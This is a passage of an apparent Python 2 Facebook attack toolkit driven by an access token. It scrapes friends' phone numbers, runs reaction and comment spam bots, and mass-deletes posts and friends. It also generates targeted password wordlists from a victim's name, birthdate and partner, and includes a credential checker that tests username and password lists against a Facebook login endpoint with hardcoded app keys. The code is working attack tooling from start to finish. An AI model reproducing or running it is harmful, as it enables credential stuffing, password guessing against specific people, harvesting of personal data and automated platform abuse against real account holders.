Phone\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] An error occurred ' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def hpfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromfriends.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def menu_bot(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Bot Reactions Target Post' print '║-> \x1b[1;37;40m2. Bot Reactions Group Post' print '║-> \x1b[1;37;40m3. Bot Comment Target Post' print '║-> \x1b[1;37;40m4. Bot Comment Group Post' print '║-> \x1b[1;37;40m5. Mass Delete Post' print '║-> \x1b[1;37;40m6. Accept Friend Requests' print '║-> \x1b[1;37;40m7. Unfriends' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' bot_pilih() def bot_pilih(): bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if bots == '': print '\x1b[1;91m[!] Can\'t empty' bot_pilih() else: if bots == '1': menu_react() else: if bots == '2': grup_react() else: if bots == '3': bot_komen() else: if bots == '4': grup_komen() else: if bots == '5': deletepost() else: if bots == '6': accept() else: if bots == '7': unfriend() else: if bots == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found' bot_pilih() def menu_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. \x1b[1;97mLike' print '║-> \x1b[1;37;40m2. \x1b[1;97mLove' print '║-> \x1b[1;37;40m3. \x1b[1;97mWow' print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha' print '║-> \x1b[1;37;40m5. \x1b[1;97mSad' print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' react_pilih() def react_pilih(): global tipe aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Can\'t empty' react_pilih() else: if aksi == '1': tipe = 'LIKE' react() else: if aksi == '2': tipe = 'LOVE' react() else: if aksi == '3': tipe = 'WOW' react() else: if aksi == '4': tipe = 'HAHA' react() else: if aksi == '5': tipe = 'SAD' react() else: if aksi == '6': tipe = 'ANGRY' react() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found' react_pilih() def react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') try: oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksi.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def grup_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. \x1b[1;97mLike' print '║-> \x1b[1;37;40m2. \x1b[1;97mLove' print '║-> \x1b[1;37;40m3. \x1b[1;97mWow' print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha' print '║-> \x1b[1;37;40m5. \x1b[1;97mSad' print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' reactg_pilih() def reactg_pilih(): global tipe aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Can\'t empty' reactg_pilih() else: if aksi == '1': tipe = 'LIKE' reactg() else: if aksi == '2': tipe = 'LOVE' reactg() else: if aksi == '3': tipe = 'WOW' reactg() else: if aksi == '4': tipe = 'HAHA' reactg() else: if aksi == '5': tipe = 'SAD' reactg() else: if aksi == '6': tipe = 'ANGRY' reactg() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found' reactg_pilih() def reactg(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] try: oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksigrup.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def bot_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komen.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def grup_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komengrup.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def deletepost(): os.system('clear') try: toket = open('login.txt', 'r').read() nam = requests.get('https://graph.facebook.com/me?access_token=' + toket) lol = json.loads(nam.text) nama = lol['name'] except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...') print 52 * '\x1b[1;97m\xe2\x95\x90' asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket) asus = json.loads(asu.text) for p in asus['data']: id = p['id'] piro = 0 url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket) ok = json.loads(url.text) try: error = ok['error']['message'] print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed' except TypeError: print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved' piro += 1 except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Connection Error' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def accept(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket) friends = json.loads(r.text) if '[]' in str(friends['data']): print '\x1b[1;91m[!] No friends request' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in friends['data']: gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket) a = json.loads(gas.text) if 'error' in str(a): print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed' print 52 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def unfriend(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;97mStop \x1b[1;91mCTRL+C' print try: pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(pek.text) for i in cok['data']: nama = i['name'] id = i['id'] requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket) print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id except IndexError: pass except KeyboardInterrupt: print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def lain(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Write Status' print '║-> \x1b[1;37;40m2. Make Wordlist' print '║-> \x1b[1;37;40m3. Account Checker' print '║-> \x1b[1;37;40m4. List Group' print '║-> \x1b[1;37;40m5. Profile Guard' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' pilih_lain() def pilih_lain(): other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if other == '': print '\x1b[1;91m[!] Can\'t empty' pilih_lain() else: if other == '1': status() else: if other == '2': wordlist() else: if other == '3': check_akun() else: if other == '4': grupsaya() else: if other == '5': guard() else: if other == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found' pilih_lain() def status(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ') if msg == '': print '\x1b[1;91m[!] Can\'t empty' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket) op = json.loads(res.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id'] raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def wordlist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah' print 52 * '\x1b[1;97m\xe2\x95\x90' a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ') file = open(a + '.txt', 'w') b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ') c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ') d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ') e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') f = e[0:2] g = e[2:4] h = e[4:] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v' i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ') j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ') k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') l = k[0:2] m = k[2:4] n = k[4:] file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k)) wg = 0 while wg < 100: wg = wg + 1 file.write(a + str(wg) + '\n') en = 0 while en < 100: en = en + 1 file.write(i + str(en) + '\n') word = 0 while word < 100: word = word + 1 file.write(d + str(word) + '\n') gen = 0 while gen < 100: gen = gen + 1 file.write(j + str(gen) + '\n') file.close() time.sleep(1.5) print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except IOError as e: print '\x1b[1;91m[!] Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def check_akun(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password' print 52 * '\x1b[1;97m\xe2\x95\x90' live = [] cek = [] die = [] try: file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ') list = open(file, 'r').readlines() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for meki in list: username, password = meki.strip().split(str(pemisah)) url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = requests.get(url) mpsh = json.loads(data.text) if 'access_token' in mpsh: live.append(password) print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password elif 'www.facebook.com' in mpsh['error_msg']: cek.append(password) print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password else: die.append(password) print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def grupsaya(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id'] f = open('grupid.txt', 'w') listgrup.append(id) f.write(id + '\n') print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama) print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id) print 52 * '\x1b[1;97m=' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup) print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt' f.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except KeyError: os.remove('grupid.txt') print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def guard(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Enable' print '║-> \x1b[1;37;40m2. Disable' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if g == '1': aktif = 'true' gaz(toket, aktif) else: if g == '2': non = 'false' gaz(toket, non) else: if g == '0': lain() else: if g == '': keluar() else: keluar() def get_userid(toket): url = 'https://graph.facebook.com/me?access_token=%s' % toket res = requests.get(url) uid = json.loads(res.text) return uid['id'] def gaz(toket, enable=True): id = get_userid(toket) data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id)) headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket} url = 'https://graph.facebook.com/graphql' res = requests.post(url, data=data, headers=headers) print res.text if '"is_shielded":true' in res.text: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: if '"is_shielded":false' in res.text: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: print '\x1b[1;91m[!] Error' keluar() if __name__ == '__main__': login()
trainer.py
